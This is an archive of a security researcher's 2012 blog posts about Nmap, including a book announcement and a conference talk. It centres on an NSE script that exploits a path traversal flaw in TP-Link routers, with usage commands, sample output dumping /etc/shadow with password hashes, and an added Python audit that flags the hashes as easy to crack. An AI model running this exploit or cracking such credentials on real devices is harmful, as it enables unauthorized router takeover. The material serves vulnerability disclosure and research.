Nmap

The evolution of Nmap

by calderpwn on Mon, Oct 15 2012 08:15:00

I have always been fond of graphical data representation, and Luis Martín Garcia shared something very cool today with the Nmap-development mailing list: the evolution of Nmap's source code.

Posted in Nmap

'Nmap 6: Network Exploration and Security Auditing Cookbook' is on pre-sale now!

by calderpwn on Thu, Sep 13 2012 16:38:00

I'm very pleased to inform you that "Nmap 6: Network Exploration and Security Auditing Cookbook" is on pre-sale now.

About the book

This book is for any security consultant, administrator or enthusiast looking to learn how to use and master Nmap and the Nmap Scripting Engine. It is divided into practical tasks, or "recipes", with full code explanations, specific Nmap commands and images to illustrate the topics.

What will you learn from the recipes covered?

Nmap's functionality is vast. The following topics are covered in over 120 practical tasks included in this book:

  • Nmap basics
  • Host discovery techniques
  • Information gathering tasks for pentesters
  • Performing security checks to web, database and mail servers
  • Implementing a host monitoring system with Nmap, Ndiff and Bash scripting
  • Distributing Nmap scans among several clients
  • Collecting HTTP header information
  • Tuning scans
  • Generating reports
  • Writing your own scripts

For more recipes, visit the full table of contents of 'Nmap 6: Network Exploration and Security Auditing Cookbook'.

Pre-order your copy now!

PacktPub: Nmap 6: Network Exploration and Security Auditing Cookbook

 

PacktPub Open Source royalties

I thought I should let you know that PacktPub gives a percentage of the sales back to open source projects such as Nmap. That means that by buying the digital or printed version of this book you also help the Nmap project!

Acknowledgments

A lot of work went into this publication, and I would like to thank the people who deserve credit for their hard work (I owe you a beer):

  • Fyodor: Thank you for guiding me through Google's Summer of Code. It was a great learning experience and none of this would have happened without you.
  • David Fifield: Thank you for all the help and sharing your expertise with me.
  • Patrik Karlsson: Many of the scripts and libraries shown in this book were written by you. Keep up the awesome work!
  • Tom Sellers: Thank you for your support and help with testing things!
  • Patrick Donnelly: Thank you for all the help with Lua.
  • Djalal Harouni: Thank you for helping me with the Exim vulnerability.
  • Vlatko Kosturjak: Thank you for porting Nmap to Android!
  • Henry Doreau: Thank you for all the hard work you've put into Nmap.
  • Ange Gutek: Thank you for all the help with http-slowloris!
  • Marc Ruef: Thank you for helping me with vulscan!
  • Ron Bowes: Thank you for all your help
  • Daniel Miller: Thank you for all your great contributions to Nmap!
  • El draco: Thank you for sharing your knowledge of distributed scanning and letting me use Dnmap's official diagrams!
  • Carlos Ayala: Thank you for your time while reviewing this book and sharing your IPS/IDS/FW expertise with me.
  • Pedro Joaquín & Roberto Salgado: Thank you for all the extra work you had to put in at Websec to cover for me while I worked on this.
  • Renata Gomez: For sending the cover image of this book!
  • Nmap community: Thank you to all of you, from bug reporters to contributors. You all help make Nmap an excellent and very active open source project.
  • Packtpub: Thank you for the opportunity!

Pwning a TP-LINK WR740N with Nmap

by calderpwn on Tue, Sep 04 2012 15:03:00

This is a demo I showed a few days ago where we use a path traversal vulnerability to obtain the credentials of a hidden web shell in TP-LINK WR740N devices.

Posted in Nmap

http-tplink-dir-traversal

by Paulino Calderon on Tue, Jul 10 2012 05:18:00

I wrote an NSE script to exploit a path traversal vulnerability in several TP-Link access points.

description = [[
Exploits a directory traversal vulnerability existing in several TP-Link wireless routers. Attackers may exploit this vulnerability to read any of the configuration and password files remotely and without authentication.

This vulnerability was confirmed in models WR740N, WR740ND and WR2543ND but there are several models that use the same HTTP server so I believe they could be vulnerable as well. I appreciate any help confirming the vulnerability in other models.

Advisory:
* http://websec.ca/advisories/view/path-traversal-vulnerability-tplink-wdr740

Other interesting files:
* /tmp/topology.cnf (Wireless configuration)
* /tmp/ath0.ap_bss (Wireless encryption key)
]]

---
-- @usage nmap -p80 --script http-tplink-dir-traversal.nse <target>
-- @usage nmap -p80 -Pn -n --script http-tplink-dir-traversal.nse <target>
-- @usage nmap -p80 --script http-tplink-dir-traversal.nse --script-args rfile=/etc/topology.conf -d -n -Pn <target>
--
-- @output
-- PORT   STATE SERVICE REASON
-- 80/tcp open  http    syn-ack
-- | http-tplink-dir-traversal:
-- |   VULNERABLE:
-- |   Path traversal vulnerability in several TP-Link wireless routers
-- |     State: VULNERABLE (Exploitable)
-- |     Description:
-- |       Some TP-Link wireless routers are vulnerable to a path traversal vulnerability that allows attackers to read configurations or any other file in the device.
-- |       This vulnerability can be exploited remotely and without authentication.
-- |       Confirmed vulnerable models: WR740N, WR740ND, WR2543ND
-- |       Possibly vulnerable (Based on the same firmware): WR743ND,WR842ND,WA-901ND,WR941N,WR941ND,WR1043ND,MR3220,MR3020,WR841N.
-- |     Disclosure date: 2012-06-18
-- |     Extra information:
-- |       /etc/shadow :
-- |
-- |   root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
-- |   Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
-- |   bin::10933:0:99999:7:::
-- |   daemon::10933:0:99999:7:::
-- |   adm::10933:0:99999:7:::
-- |   lp:*:10933:0:99999:7:::
-- |   sync:*:10933:0:99999:7:::
-- |   shutdown:*:10933:0:99999:7:::
-- |   halt:*:10933:0:99999:7:::
-- |   uucp:*:10933:0:99999:7:::
-- |   operator:*:10933:0:99999:7:::
-- |   nobody::10933:0:99999:7:::
-- |   ap71::10933:0:99933:7:::
-- |
-- |     References:
-- |_      http://websec.ca/advisories/view/path-traversal-vulnerability-tplink-wdr740
--
-- @args http-tplink-dir-traversal.rfile Remote file to download. Default: /etc/passwd
-- @args http-tplink-dir-traversal.outfile If set it saves the remote file to this location.
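What the retrieved /etc/shadow actually tells you is easy to miss when it scrolls past in script output. The following Python is an added example, not part of the NSE script or of the Nmap project: it parses shadow(5) lines and flags the things a pentester checks first (accounts with no password, accounts sharing one hash, hashes with an empty salt, and the "last changed" date), using the /etc/shadow dump from the @output above as constructed sample input. The algorithm identifiers and the 13-character DES heuristic are standard crypt(3) conventions; everything else is this example's own.

```python
import re
from collections import defaultdict
from datetime import date, timedelta

# Constructed sample input: the /etc/shadow contents shown in the script's
# @output above, embedded here so the audit runs offline.
SAMPLE_SHADOW = """\
root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
bin::10933:0:99999:7:::
daemon::10933:0:99999:7:::
adm::10933:0:99999:7:::
lp:*:10933:0:99999:7:::
sync:*:10933:0:99999:7:::
shutdown:*:10933:0:99999:7:::
halt:*:10933:0:99999:7:::
uucp:*:10933:0:99999:7:::
operator:*:10933:0:99999:7:::
nobody::10933:0:99999:7:::
ap71::10933:0:99999:7:::
"""

# crypt(3) "$id$" prefixes; any other id is reported raw rather than guessed.
CRYPT_IDS = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
             "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt"}


def parse_shadow(text):
    """Split shadow(5) lines into (name, hash, lastchg_days) tuples.
    Blank lines, comments and lines with too few fields are skipped."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 3:
            continue
        try:
            lastchg = int(fields[2]) if fields[2] else None
        except ValueError:
            lastchg = None
        entries.append((fields[0], fields[1], lastchg))
    return entries


def classify_hash(h):
    """Return (kind, salt). kind is 'empty', 'locked', a crypt algorithm name,
    'descrypt' or 'unknown'; salt is None unless the hash has a $id$salt$hash form."""
    if h == "":
        return "empty", None                 # no password at all
    if h.startswith(("*", "!")):
        return "locked", None                # '*', '!', '!!' or '!<hash>'
    m = re.match(r"^\$([^$]+)\$([^$]*)\$(.+)$", h)
    if m:
        return CRYPT_IDS.get(m.group(1), "crypt-id-" + m.group(1)), m.group(2)
    if len(h) == 13:                         # traditional DES crypt: 2-char salt + 11
        return "descrypt", h[:2]
    return "unknown", None


def last_change(lastchg_days):
    """Shadow field 3 is days since 1970-01-01; turn it into a date."""
    if lastchg_days is None:
        return None
    return date(1970, 1, 1) + timedelta(days=lastchg_days)


def audit_shadow(text):
    """Flag what matters once a device's /etc/shadow has been read."""
    report = {"empty_password": [], "locked": [], "hashed": {},
              "no_salt": [], "shared_hash": {}, "last_change": {}}
    by_hash = defaultdict(list)
    for name, h, lastchg in parse_shadow(text):
        kind, salt = classify_hash(h)
        if kind == "empty":
            report["empty_password"].append(name)
            continue
        if kind == "locked":
            report["locked"].append(name)
            continue
        report["hashed"][name] = kind
        report["last_change"][name] = last_change(lastchg)
        if salt == "":                       # e.g. "$1$$..." : no salt at all
            report["no_salt"].append(name)
        by_hash[h].append(name)
    # Two accounts with byte-identical hashes share the same password.
    report["shared_hash"] = {h: n for h, n in by_hash.items() if len(n) > 1}
    return report


if __name__ == "__main__":
    r = audit_shadow(SAMPLE_SHADOW)
    print("no password:", ", ".join(r["empty_password"]))
    print("locked:     ", ", ".join(r["locked"]))
    for name, algo in r["hashed"].items():
        print(f"hashed:      {name:<8} {algo:<12} last changed {r['last_change'][name]}")
    for h, names in r["shared_hash"].items():
        print("shared hash:", h, "->", ", ".join(names))
    print("empty salt: ", ", ".join(r["no_salt"]))
```

On the sample, root and Admin share one md5crypt hash with an empty salt (the `$1$$` prefix), so they have the same password and a single cracking run with john or hashcat covers both; bin, daemon, adm, nobody and ap71 have no password at all; and every entry was last changed on day 10933, which is 1999-12-08, a strong sign of a baked-in firmware default rather than anything the owner set.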

 

Resources 

http-tplink-dir-traversal on Github

dotdotpwn log

Posted in Nmap, Code

GuadalajaraCON 2012 presentation

by Paulino Calderon on Sun, May 06 2012 23:00:00

This past April 21st I gave a talk on distributed scanning at GuadalajaraCON 2012. We released a special version of the Dnmap tool for this event. You can download the slides and the software from the following links:

http://www.guadalajaracon.org/wp-content/uploads/2012/04/GuadalajaraCONNmapDistribuidoSlides.pdf

http://guadalajaracon.org/dnmap.tar.gz
